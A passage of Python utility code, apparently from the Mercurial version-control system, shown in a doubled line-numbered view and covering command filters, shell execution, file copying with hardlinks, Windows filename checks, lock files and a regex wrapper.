1537 os.close(outfd)
1538 cmd = cmd.replace('INFILE', inname)
1538 cmd = cmd.replace('INFILE', inname)
1539 cmd = cmd.replace('OUTFILE', outname)
1539 cmd = cmd.replace('OUTFILE', outname)
1540 code = os.system(cmd)
1540 code = os.system(cmd)
1541 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1541 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1542 code = 0
1542 code = 0
1543 if code:
1543 if code:
1544 raise Abort(_("command '%s' failed: %s") %
1544 raise Abort(_("command '%s' failed: %s") %
1545 (cmd, explainexit(code)))
1545 (cmd, explainexit(code)))
1546 return readfile(outname)
1546 return readfile(outname)
1547 finally:
1547 finally:
1548 try:
1548 try:
1549 if inname:
1549 if inname:
1550 os.unlink(inname)
1550 os.unlink(inname)
1551 except OSError:
1551 except OSError:
1552 pass
1552 pass
1553 try:
1553 try:
1554 if outname:
1554 if outname:
1555 os.unlink(outname)
1555 os.unlink(outname)
1556 except OSError:
1556 except OSError:
1557 pass
1557 pass
1558
1558
1559 filtertable = {
1559 filtertable = {
1560 'tempfile:': tempfilter,
1560 'tempfile:': tempfilter,
1561 'pipe:': pipefilter,
1561 'pipe:': pipefilter,
1562 }
1562 }
1563
1563
1564 def filter(s, cmd):
1564 def filter(s, cmd):
1565 "filter a string through a command that transforms its input to its output"
1565 "filter a string through a command that transforms its input to its output"
1566 for name, fn in filtertable.iteritems():
1566 for name, fn in filtertable.iteritems():
1567 if cmd.startswith(name):
1567 if cmd.startswith(name):
1568 return fn(s, cmd[len(name):].lstrip())
1568 return fn(s, cmd[len(name):].lstrip())
1569 return pipefilter(s, cmd)
1569 return pipefilter(s, cmd)
1570
1570
1571 def binary(s):
1571 def binary(s):
1572 """return true if a string is binary data"""
1572 """return true if a string is binary data"""
1573 return bool(s and '\0' in s)
1573 return bool(s and '\0' in s)
1574
1574
1575 def increasingchunks(source, min=1024, max=65536):
1575 def increasingchunks(source, min=1024, max=65536):
1576 '''return no less than min bytes per chunk while data remains,
1576 '''return no less than min bytes per chunk while data remains,
1577 doubling min after each chunk until it reaches max'''
1577 doubling min after each chunk until it reaches max'''
1578 def log2(x):
1578 def log2(x):
1579 if not x:
1579 if not x:
1580 return 0
1580 return 0
1581 i = 0
1581 i = 0
1582 while x:
1582 while x:
1583 x >>= 1
1583 x >>= 1
1584 i += 1
1584 i += 1
1585 return i - 1
1585 return i - 1
1586
1586
1587 buf = []
1587 buf = []
1588 blen = 0
1588 blen = 0
1589 for chunk in source:
1589 for chunk in source:
1590 buf.append(chunk)
1590 buf.append(chunk)
1591 blen += len(chunk)
1591 blen += len(chunk)
1592 if blen >= min:
1592 if blen >= min:
1593 if min < max:
1593 if min < max:
1594 min = min << 1
1594 min = min << 1
1595 nmin = 1 << log2(blen)
1595 nmin = 1 << log2(blen)
1596 if nmin > min:
1596 if nmin > min:
1597 min = nmin
1597 min = nmin
1598 if min > max:
1598 if min > max:
1599 min = max
1599 min = max
1600 yield ''.join(buf)
1600 yield ''.join(buf)
1601 blen = 0
1601 blen = 0
1602 buf = []
1602 buf = []
1603 if buf:
1603 if buf:
1604 yield ''.join(buf)
1604 yield ''.join(buf)
1605
1605
1606 Abort = error.Abort
1606 Abort = error.Abort
1607
1607
1608 def always(fn):
1608 def always(fn):
1609 return True
1609 return True
1610
1610
1611 def never(fn):
1611 def never(fn):
1612 return False
1612 return False
1613
1613
1614 def nogc(func):
1614 def nogc(func):
1615 """disable garbage collector
1615 """disable garbage collector
1616
1616
1617 Python's garbage collector triggers a GC each time a certain number of
1617 Python's garbage collector triggers a GC each time a certain number of
1618 container objects (the number being defined by gc.get_threshold()) are
1618 container objects (the number being defined by gc.get_threshold()) are
1619 allocated even when marked not to be tracked by the collector. Tracking has
1619 allocated even when marked not to be tracked by the collector. Tracking has
1620 no effect on when GCs are triggered, only on what objects the GC looks
1620 no effect on when GCs are triggered, only on what objects the GC looks
1621 into. As a workaround, disable GC while building complex (huge)
1621 into. As a workaround, disable GC while building complex (huge)
1622 containers.
1622 containers.
1623
1623
1624 This garbage collector issue have been fixed in 2.7. But it still affect
1624 This garbage collector issue have been fixed in 2.7. But it still affect
1625 CPython's performance.
1625 CPython's performance.
1626 """
1626 """
1627 def wrapper(*args, **kwargs):
1627 def wrapper(*args, **kwargs):
1628 gcenabled = gc.isenabled()
1628 gcenabled = gc.isenabled()
1629 gc.disable()
1629 gc.disable()
1630 try:
1630 try:
1631 return func(*args, **kwargs)
1631 return func(*args, **kwargs)
1632 finally:
1632 finally:
1633 if gcenabled:
1633 if gcenabled:
1634 gc.enable()
1634 gc.enable()
1635 return wrapper
1635 return wrapper
1636
1636
1637 if pycompat.ispypy:
1637 if pycompat.ispypy:
1638 # PyPy runs slower with gc disabled
1638 # PyPy runs slower with gc disabled
1639 nogc = lambda x: x
1639 nogc = lambda x: x
1640
1640
1641 def pathto(root, n1, n2):
1641 def pathto(root, n1, n2):
1642 '''return the relative path from one place to another.
1642 '''return the relative path from one place to another.
1643 root should use os.sep to separate directories
1643 root should use os.sep to separate directories
1644 n1 should use os.sep to separate directories
1644 n1 should use os.sep to separate directories
1645 n2 should use "/" to separate directories
1645 n2 should use "/" to separate directories
1646 returns an os.sep-separated path.
1646 returns an os.sep-separated path.
1647
1647
1648 If n1 is a relative path, it's assumed it's
1648 If n1 is a relative path, it's assumed it's
1649 relative to root.
1649 relative to root.
1650 n2 should always be relative to root.
1650 n2 should always be relative to root.
1651 '''
1651 '''
1652 if not n1:
1652 if not n1:
1653 return localpath(n2)
1653 return localpath(n2)
1654 if os.path.isabs(n1):
1654 if os.path.isabs(n1):
1655 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1655 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1656 return os.path.join(root, localpath(n2))
1656 return os.path.join(root, localpath(n2))
1657 n2 = '/'.join((pconvert(root), n2))
1657 n2 = '/'.join((pconvert(root), n2))
1658 a, b = splitpath(n1), n2.split('/')
1658 a, b = splitpath(n1), n2.split('/')
1659 a.reverse()
1659 a.reverse()
1660 b.reverse()
1660 b.reverse()
1661 while a and b and a[-1] == b[-1]:
1661 while a and b and a[-1] == b[-1]:
1662 a.pop()
1662 a.pop()
1663 b.pop()
1663 b.pop()
1664 b.reverse()
1664 b.reverse()
1665 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1665 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666
1666
1667 def mainfrozen():
1667 def mainfrozen():
1668 """return True if we are a frozen executable.
1668 """return True if we are a frozen executable.
1669
1669
1670 The code supports py2exe (most common, Windows only) and tools/freeze
1670 The code supports py2exe (most common, Windows only) and tools/freeze
1671 (portable, not much used).
1671 (portable, not much used).
1672 """
1672 """
1673 return (safehasattr(sys, "frozen") or # new py2exe
1673 return (safehasattr(sys, "frozen") or # new py2exe
1674 safehasattr(sys, "importers") or # old py2exe
1674 safehasattr(sys, "importers") or # old py2exe
1675 imp.is_frozen(u"__main__")) # tools/freeze
1675 imp.is_frozen(u"__main__")) # tools/freeze
1676
1676
1677 # the location of data files matching the source code
1677 # the location of data files matching the source code
1678 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1678 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1679 # executable version (py2exe) doesn't support __file__
1679 # executable version (py2exe) doesn't support __file__
1680 datapath = os.path.dirname(pycompat.sysexecutable)
1680 datapath = os.path.dirname(pycompat.sysexecutable)
1681 else:
1681 else:
1682 datapath = os.path.dirname(pycompat.fsencode(__file__))
1682 datapath = os.path.dirname(pycompat.fsencode(__file__))
1683
1683
1684 i18n.setdatapath(datapath)
1684 i18n.setdatapath(datapath)
1685
1685
1686 _hgexecutable = None
1686 _hgexecutable = None
1687
1687
1688 def hgexecutable():
1688 def hgexecutable():
1689 """return location of the 'hg' executable.
1689 """return location of the 'hg' executable.
1690
1690
1691 Defaults to $HG or 'hg' in the search path.
1691 Defaults to $HG or 'hg' in the search path.
1692 """
1692 """
1693 if _hgexecutable is None:
1693 if _hgexecutable is None:
1694 hg = encoding.environ.get('HG')
1694 hg = encoding.environ.get('HG')
1695 mainmod = sys.modules[r'__main__']
1695 mainmod = sys.modules[r'__main__']
1696 if hg:
1696 if hg:
1697 _sethgexecutable(hg)
1697 _sethgexecutable(hg)
1698 elif mainfrozen():
1698 elif mainfrozen():
1699 if getattr(sys, 'frozen', None) == 'macosx_app':
1699 if getattr(sys, 'frozen', None) == 'macosx_app':
1700 # Env variable set by py2app
1700 # Env variable set by py2app
1701 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1701 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1702 else:
1702 else:
1703 _sethgexecutable(pycompat.sysexecutable)
1703 _sethgexecutable(pycompat.sysexecutable)
1704 elif (os.path.basename(
1704 elif (os.path.basename(
1705 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1705 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1706 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1706 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1707 else:
1707 else:
1708 exe = findexe('hg') or os.path.basename(sys.argv[0])
1708 exe = findexe('hg') or os.path.basename(sys.argv[0])
1709 _sethgexecutable(exe)
1709 _sethgexecutable(exe)
1710 return _hgexecutable
1710 return _hgexecutable
1711
1711
1712 def _sethgexecutable(path):
1712 def _sethgexecutable(path):
1713 """set location of the 'hg' executable"""
1713 """set location of the 'hg' executable"""
1714 global _hgexecutable
1714 global _hgexecutable
1715 _hgexecutable = path
1715 _hgexecutable = path
1716
1716
1717 def _testfileno(f, stdf):
1717 def _testfileno(f, stdf):
1718 fileno = getattr(f, 'fileno', None)
1718 fileno = getattr(f, 'fileno', None)
1719 try:
1719 try:
1720 return fileno and fileno() == stdf.fileno()
1720 return fileno and fileno() == stdf.fileno()
1721 except io.UnsupportedOperation:
1721 except io.UnsupportedOperation:
1722 return False # fileno() raised UnsupportedOperation
1722 return False # fileno() raised UnsupportedOperation
1723
1723
1724 def isstdin(f):
1724 def isstdin(f):
1725 return _testfileno(f, sys.__stdin__)
1725 return _testfileno(f, sys.__stdin__)
1726
1726
1727 def isstdout(f):
1727 def isstdout(f):
1728 return _testfileno(f, sys.__stdout__)
1728 return _testfileno(f, sys.__stdout__)
1729
1729
1730 def shellenviron(environ=None):
1730 def shellenviron(environ=None):
1731 """return environ with optional override, useful for shelling out"""
1731 """return environ with optional override, useful for shelling out"""
1732 def py2shell(val):
1732 def py2shell(val):
1733 'convert python object into string that is useful to shell'
1733 'convert python object into string that is useful to shell'
1734 if val is None or val is False:
1734 if val is None or val is False:
1735 return '0'
1735 return '0'
1736 if val is True:
1736 if val is True:
1737 return '1'
1737 return '1'
1738 return pycompat.bytestr(val)
1738 return pycompat.bytestr(val)
1739 env = dict(encoding.environ)
1739 env = dict(encoding.environ)
1740 if environ:
1740 if environ:
1741 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1741 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1742 env['HG'] = hgexecutable()
1742 env['HG'] = hgexecutable()
1743 return env
1743 return env
1744
1744
1745 def system(cmd, environ=None, cwd=None, out=None):
1745 def system(cmd, environ=None, cwd=None, out=None):
1746 '''enhanced shell command execution.
1746 '''enhanced shell command execution.
1747 run with environment maybe modified, maybe in different dir.
1747 run with environment maybe modified, maybe in different dir.
1748
1748
1749 if out is specified, it is assumed to be a file-like object that has a
1749 if out is specified, it is assumed to be a file-like object that has a
1750 write() method. stdout and stderr will be redirected to out.'''
1750 write() method. stdout and stderr will be redirected to out.'''
1751 try:
1751 try:
1752 stdout.flush()
1752 stdout.flush()
1753 except Exception:
1753 except Exception:
1754 pass
1754 pass
1755 cmd = quotecommand(cmd)
1755 cmd = quotecommand(cmd)
1756 env = shellenviron(environ)
1756 env = shellenviron(environ)
1757 if out is None or isstdout(out):
1757 if out is None or isstdout(out):
1758 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1758 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1759 env=env, cwd=cwd)
1759 env=env, cwd=cwd)
1760 else:
1760 else:
1761 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1761 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1762 env=env, cwd=cwd, stdout=subprocess.PIPE,
1762 env=env, cwd=cwd, stdout=subprocess.PIPE,
1763 stderr=subprocess.STDOUT)
1763 stderr=subprocess.STDOUT)
1764 for line in iter(proc.stdout.readline, ''):
1764 for line in iter(proc.stdout.readline, ''):
1765 out.write(line)
1765 out.write(line)
1766 proc.wait()
1766 proc.wait()
1767 rc = proc.returncode
1767 rc = proc.returncode
1768 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1768 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1769 rc = 0
1769 rc = 0
1770 return rc
1770 return rc
1771
1771
1772 def checksignature(func):
1772 def checksignature(func):
1773 '''wrap a function with code to check for calling errors'''
1773 '''wrap a function with code to check for calling errors'''
1774 def check(*args, **kwargs):
1774 def check(*args, **kwargs):
1775 try:
1775 try:
1776 return func(*args, **kwargs)
1776 return func(*args, **kwargs)
1777 except TypeError:
1777 except TypeError:
1778 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1778 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1779 raise error.SignatureError
1779 raise error.SignatureError
1780 raise
1780 raise
1781
1781
1782 return check
1782 return check
1783
1783
1784 # a whilelist of known filesystems where hardlink works reliably
1784 # a whilelist of known filesystems where hardlink works reliably
1785 _hardlinkfswhitelist = {
1785 _hardlinkfswhitelist = {
1786 'btrfs',
1786 'btrfs',
1787 'ext2',
1787 'ext2',
1788 'ext3',
1788 'ext3',
1789 'ext4',
1789 'ext4',
1790 'hfs',
1790 'hfs',
1791 'jfs',
1791 'jfs',
1792 'NTFS',
1792 'NTFS',
1793 'reiserfs',
1793 'reiserfs',
1794 'tmpfs',
1794 'tmpfs',
1795 'ufs',
1795 'ufs',
1796 'xfs',
1796 'xfs',
1797 'zfs',
1797 'zfs',
1798 }
1798 }
1799
1799
1800 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1800 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1801 '''copy a file, preserving mode and optionally other stat info like
1801 '''copy a file, preserving mode and optionally other stat info like
1802 atime/mtime
1802 atime/mtime
1803
1803
1804 checkambig argument is used with filestat, and is useful only if
1804 checkambig argument is used with filestat, and is useful only if
1805 destination file is guarded by any lock (e.g. repo.lock or
1805 destination file is guarded by any lock (e.g. repo.lock or
1806 repo.wlock).
1806 repo.wlock).
1807
1807
1808 copystat and checkambig should be exclusive.
1808 copystat and checkambig should be exclusive.
1809 '''
1809 '''
1810 assert not (copystat and checkambig)
1810 assert not (copystat and checkambig)
1811 oldstat = None
1811 oldstat = None
1812 if os.path.lexists(dest):
1812 if os.path.lexists(dest):
1813 if checkambig:
1813 if checkambig:
1814 oldstat = checkambig and filestat.frompath(dest)
1814 oldstat = checkambig and filestat.frompath(dest)
1815 unlink(dest)
1815 unlink(dest)
1816 if hardlink:
1816 if hardlink:
1817 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1817 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1818 # unless we are confident that dest is on a whitelisted filesystem.
1818 # unless we are confident that dest is on a whitelisted filesystem.
1819 try:
1819 try:
1820 fstype = getfstype(os.path.dirname(dest))
1820 fstype = getfstype(os.path.dirname(dest))
1821 except OSError:
1821 except OSError:
1822 fstype = None
1822 fstype = None
1823 if fstype not in _hardlinkfswhitelist:
1823 if fstype not in _hardlinkfswhitelist:
1824 hardlink = False
1824 hardlink = False
1825 if hardlink:
1825 if hardlink:
1826 try:
1826 try:
1827 oslink(src, dest)
1827 oslink(src, dest)
1828 return
1828 return
1829 except (IOError, OSError):
1829 except (IOError, OSError):
1830 pass # fall back to normal copy
1830 pass # fall back to normal copy
1831 if os.path.islink(src):
1831 if os.path.islink(src):
1832 os.symlink(os.readlink(src), dest)
1832 os.symlink(os.readlink(src), dest)
1833 # copytime is ignored for symlinks, but in general copytime isn't needed
1833 # copytime is ignored for symlinks, but in general copytime isn't needed
1834 # for them anyway
1834 # for them anyway
1835 else:
1835 else:
1836 try:
1836 try:
1837 shutil.copyfile(src, dest)
1837 shutil.copyfile(src, dest)
1838 if copystat:
1838 if copystat:
1839 # copystat also copies mode
1839 # copystat also copies mode
1840 shutil.copystat(src, dest)
1840 shutil.copystat(src, dest)
1841 else:
1841 else:
1842 shutil.copymode(src, dest)
1842 shutil.copymode(src, dest)
1843 if oldstat and oldstat.stat:
1843 if oldstat and oldstat.stat:
1844 newstat = filestat.frompath(dest)
1844 newstat = filestat.frompath(dest)
1845 if newstat.isambig(oldstat):
1845 if newstat.isambig(oldstat):
1846 # stat of copied file is ambiguous to original one
1846 # stat of copied file is ambiguous to original one
1847 advanced = (
1847 advanced = (
1848 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1848 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1849 os.utime(dest, (advanced, advanced))
1849 os.utime(dest, (advanced, advanced))
1850 except shutil.Error as inst:
1850 except shutil.Error as inst:
1851 raise Abort(str(inst))
1851 raise Abort(str(inst))
1852
1852
1853 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1853 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1854 """Copy a directory tree using hardlinks if possible."""
1854 """Copy a directory tree using hardlinks if possible."""
1855 num = 0
1855 num = 0
1856
1856
1857 gettopic = lambda: hardlink and _('linking') or _('copying')
1857 gettopic = lambda: hardlink and _('linking') or _('copying')
1858
1858
1859 if os.path.isdir(src):
1859 if os.path.isdir(src):
1860 if hardlink is None:
1860 if hardlink is None:
1861 hardlink = (os.stat(src).st_dev ==
1861 hardlink = (os.stat(src).st_dev ==
1862 os.stat(os.path.dirname(dst)).st_dev)
1862 os.stat(os.path.dirname(dst)).st_dev)
1863 topic = gettopic()
1863 topic = gettopic()
1864 os.mkdir(dst)
1864 os.mkdir(dst)
1865 for name, kind in listdir(src):
1865 for name, kind in listdir(src):
1866 srcname = os.path.join(src, name)
1866 srcname = os.path.join(src, name)
1867 dstname = os.path.join(dst, name)
1867 dstname = os.path.join(dst, name)
1868 def nprog(t, pos):
1868 def nprog(t, pos):
1869 if pos is not None:
1869 if pos is not None:
1870 return progress(t, pos + num)
1870 return progress(t, pos + num)
1871 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1871 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1872 num += n
1872 num += n
1873 else:
1873 else:
1874 if hardlink is None:
1874 if hardlink is None:
1875 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1875 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1876 os.stat(os.path.dirname(dst)).st_dev)
1876 os.stat(os.path.dirname(dst)).st_dev)
1877 topic = gettopic()
1877 topic = gettopic()
1878
1878
1879 if hardlink:
1879 if hardlink:
1880 try:
1880 try:
1881 oslink(src, dst)
1881 oslink(src, dst)
1882 except (IOError, OSError):
1882 except (IOError, OSError):
1883 hardlink = False
1883 hardlink = False
1884 shutil.copy(src, dst)
1884 shutil.copy(src, dst)
1885 else:
1885 else:
1886 shutil.copy(src, dst)
1886 shutil.copy(src, dst)
1887 num += 1
1887 num += 1
1888 progress(topic, num)
1888 progress(topic, num)
1889 progress(topic, None)
1889 progress(topic, None)
1890
1890
1891 return hardlink, num
1891 return hardlink, num
1892
1892
1893 _winreservednames = {
1893 _winreservednames = {
1894 'con', 'prn', 'aux', 'nul',
1894 'con', 'prn', 'aux', 'nul',
1895 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1895 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1896 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1896 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1897 }
1897 }
1898 _winreservedchars = ':*?"<>|'
1898 _winreservedchars = ':*?"<>|'
1899 def checkwinfilename(path):
1899 def checkwinfilename(path):
1900 r'''Check that the base-relative path is a valid filename on Windows.
1900 r'''Check that the base-relative path is a valid filename on Windows.
1901 Returns None if the path is ok, or a UI string describing the problem.
1901 Returns None if the path is ok, or a UI string describing the problem.
1902
1902
1903 >>> checkwinfilename(b"just/a/normal/path")
1903 >>> checkwinfilename(b"just/a/normal/path")
1904 >>> checkwinfilename(b"foo/bar/con.xml")
1904 >>> checkwinfilename(b"foo/bar/con.xml")
1905 "filename contains 'con', which is reserved on Windows"
1905 "filename contains 'con', which is reserved on Windows"
1906 >>> checkwinfilename(b"foo/con.xml/bar")
1906 >>> checkwinfilename(b"foo/con.xml/bar")
1907 "filename contains 'con', which is reserved on Windows"
1907 "filename contains 'con', which is reserved on Windows"
1908 >>> checkwinfilename(b"foo/bar/xml.con")
1908 >>> checkwinfilename(b"foo/bar/xml.con")
1909 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1909 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1910 "filename contains 'AUX', which is reserved on Windows"
1910 "filename contains 'AUX', which is reserved on Windows"
1911 >>> checkwinfilename(b"foo/bar/bla:.txt")
1911 >>> checkwinfilename(b"foo/bar/bla:.txt")
1912 "filename contains ':', which is reserved on Windows"
1912 "filename contains ':', which is reserved on Windows"
1913 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1913 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1914 "filename contains '\\x07', which is invalid on Windows"
1914 "filename contains '\\x07', which is invalid on Windows"
1915 >>> checkwinfilename(b"foo/bar/bla ")
1915 >>> checkwinfilename(b"foo/bar/bla ")
1916 "filename ends with ' ', which is not allowed on Windows"
1916 "filename ends with ' ', which is not allowed on Windows"
1917 >>> checkwinfilename(b"../bar")
1917 >>> checkwinfilename(b"../bar")
1918 >>> checkwinfilename(b"foo\\")
1918 >>> checkwinfilename(b"foo\\")
1919 "filename ends with '\\', which is invalid on Windows"
1919 "filename ends with '\\', which is invalid on Windows"
1920 >>> checkwinfilename(b"foo\\/bar")
1920 >>> checkwinfilename(b"foo\\/bar")
1921 "directory name ends with '\\', which is invalid on Windows"
1921 "directory name ends with '\\', which is invalid on Windows"
1922 '''
1922 '''
1923 if path.endswith('\\'):
1923 if path.endswith('\\'):
1924 return _("filename ends with '\\', which is invalid on Windows")
1924 return _("filename ends with '\\', which is invalid on Windows")
1925 if '\\/' in path:
1925 if '\\/' in path:
1926 return _("directory name ends with '\\', which is invalid on Windows")
1926 return _("directory name ends with '\\', which is invalid on Windows")
1927 for n in path.replace('\\', '/').split('/'):
1927 for n in path.replace('\\', '/').split('/'):
1928 if not n:
1928 if not n:
1929 continue
1929 continue
1930 for c in _filenamebytestr(n):
1930 for c in _filenamebytestr(n):
1931 if c in _winreservedchars:
1931 if c in _winreservedchars:
1932 return _("filename contains '%s', which is reserved "
1932 return _("filename contains '%s', which is reserved "
1933 "on Windows") % c
1933 "on Windows") % c
1934 if ord(c) <= 31:
1934 if ord(c) <= 31:
1935 return _("filename contains '%s', which is invalid "
1935 return _("filename contains '%s', which is invalid "
1936 "on Windows") % escapestr(c)
1936 "on Windows") % escapestr(c)
1937 base = n.split('.')[0]
1937 base = n.split('.')[0]
1938 if base and base.lower() in _winreservednames:
1938 if base and base.lower() in _winreservednames:
1939 return _("filename contains '%s', which is reserved "
1939 return _("filename contains '%s', which is reserved "
1940 "on Windows") % base
1940 "on Windows") % base
1941 t = n[-1:]
1941 t = n[-1:]
1942 if t in '. ' and n not in '..':
1942 if t in '. ' and n not in '..':
1943 return _("filename ends with '%s', which is not allowed "
1943 return _("filename ends with '%s', which is not allowed "
1944 "on Windows") % t
1944 "on Windows") % t
1945
1945
1946 if pycompat.iswindows:
1946 if pycompat.iswindows:
1947 checkosfilename = checkwinfilename
1947 checkosfilename = checkwinfilename
1948 timer = time.clock
1948 timer = time.clock
1949 else:
1949 else:
1950 checkosfilename = platform.checkosfilename
1950 checkosfilename = platform.checkosfilename
1951 timer = time.time
1951 timer = time.time
1952
1952
1953 if safehasattr(time, "perf_counter"):
1953 if safehasattr(time, "perf_counter"):
1954 timer = time.perf_counter
1954 timer = time.perf_counter
1955
1955
1956 def makelock(info, pathname):
1956 def makelock(info, pathname):
1957 """Create a lock file atomically if possible
1957 """Create a lock file atomically if possible
1958
1958
1959 This may leave a stale lock file if symlink isn't supported and signal
1959 This may leave a stale lock file if symlink isn't supported and signal
1960 interrupt is enabled.
1960 interrupt is enabled.
1961 """
1961 """
1962 try:
1962 try:
1963 return os.symlink(info, pathname)
1963 return os.symlink(info, pathname)
1964 except OSError as why:
1964 except OSError as why:
1965 if why.errno == errno.EEXIST:
1965 if why.errno == errno.EEXIST:
1966 raise
1966 raise
1967 except AttributeError: # no symlink in os
1967 except AttributeError: # no symlink in os
1968 pass
1968 pass
1969
1969
1970 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1970 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1971 ld = os.open(pathname, flags)
1971 ld = os.open(pathname, flags)
1972 os.write(ld, info)
1972 os.write(ld, info)
1973 os.close(ld)
1973 os.close(ld)
1974
1974
1975 def readlock(pathname):
1975 def readlock(pathname):
1976 try:
1976 try:
1977 return os.readlink(pathname)
1977 return os.readlink(pathname)
1978 except OSError as why:
1978 except OSError as why:
1979 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1979 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1980 raise
1980 raise
1981 except AttributeError: # no symlink in os
1981 except AttributeError: # no symlink in os
1982 pass
1982 pass
1983 fp = posixfile(pathname, 'rb')
1983 fp = posixfile(pathname, 'rb')
1984 r = fp.read()
1984 r = fp.read()
1985 fp.close()
1985 fp.close()
1986 return r
1986 return r
1987
1987
1988 def fstat(fp):
1988 def fstat(fp):
1989 '''stat file object that may not have fileno method.'''
1989 '''stat file object that may not have fileno method.'''
1990 try:
1990 try:
1991 return os.fstat(fp.fileno())
1991 return os.fstat(fp.fileno())
1992 except AttributeError:
1992 except AttributeError:
1993 return os.stat(fp.name)
1993 return os.stat(fp.name)
1994
1994
1995 # File system features
1995 # File system features
1996
1996
1997 def fscasesensitive(path):
1997 def fscasesensitive(path):
1998 """
1998 """
1999 Return true if the given path is on a case-sensitive filesystem
1999 Return true if the given path is on a case-sensitive filesystem
2000
2000
2001 Requires a path (like /foo/.hg) ending with a foldable final
2001 Requires a path (like /foo/.hg) ending with a foldable final
2002 directory component.
2002 directory component.
2003 """
2003 """
2004 s1 = os.lstat(path)
2004 s1 = os.lstat(path)
2005 d, b = os.path.split(path)
2005 d, b = os.path.split(path)
2006 b2 = b.upper()
2006 b2 = b.upper()
2007 if b == b2:
2007 if b == b2:
2008 b2 = b.lower()
2008 b2 = b.lower()
2009 if b == b2:
2009 if b == b2:
2010 return True # no evidence against case sensitivity
2010 return True # no evidence against case sensitivity
2011 p2 = os.path.join(d, b2)
2011 p2 = os.path.join(d, b2)
2012 try:
2012 try:
2013 s2 = os.lstat(p2)
2013 s2 = os.lstat(p2)
2014 if s2 == s1:
2014 if s2 == s1:
2015 return False
2015 return False
2016 return True
2016 return True
2017 except OSError:
2017 except OSError:
2018 return True
2018 return True
2019
2019
2020 try:
2020 try:
2021 import re2
2021 import re2
2022 _re2 = None
2022 _re2 = None
2023 except ImportError:
2023 except ImportError:
2024 _re2 = False
2024 _re2 = False
2025
2025
2026 class _re(object):
2026 class _re(object):
2027 def _checkre2(self):
2027 def _checkre2(self):
2028 global _re2
2028 global _re2
2029 try:
2029 try:
2030 # check if match works, see issue3964
2030 # check if match works, see issue3964
2031 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2031 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2032 except ImportError:
2032 except ImportError:
2033 _re2 = False
2033 _re2 = False
2034
2034
2035 def compile(self, pat, flags=0):
2035 def compile(self, pat, flags=0):
2036 '''Compile a regular expression, using re2 if possible
2036 '''Compile a regular expression, using re2 if possible
2037
2037
2038 For best performance, use only re2-compatible regexp features. The
2038 For best performance, use only re2-compatible regexp features. The
2039 only flags from the re module that are re2-compatible are
2039 only flags from the re module that are re2-compatible are
2040 IGNORECASE and MULTILINE.'''
2040 IGNORECASE and MULTILINE.'''
2041 if _re2 is None:
2041 if _re2 is None:
2042 self._checkre2()
2042 self._checkre2()
2043 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2043 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2044 if flags & remod.IGNORECASE:
2044 if flags & remod.IGNORECASE:
2045 pat = '(?i)' + pat
2045 pat = '(?i)' + pat
2046 if flags & remod.MULTILINE:
2046 if flags & remod.MULTILINE:
2047 pat = '(?m)' + pat
2047 pat = '(?m)' + pat
2048 try:
2048 try:
2049 return re2.compile(pat)
2049 return re2.compile(pat)
2050 except re2.error:
2050 except re2.error:
2051 pass
2051 pass
2052 return remod.compile(pat, flags)
2052 return remod.compile(pat, flags)
2053
2053
2054 @propertycache
2054 @propertycache
2055 def escape(self):
2055 def escape(self):
2056 '''Return the version of escape corresponding to self.compile.
2056 '''Return the version of escape corresponding to self.compile.
2057
2057
2058 This is imperfect because whether re2 or re is used for a particular
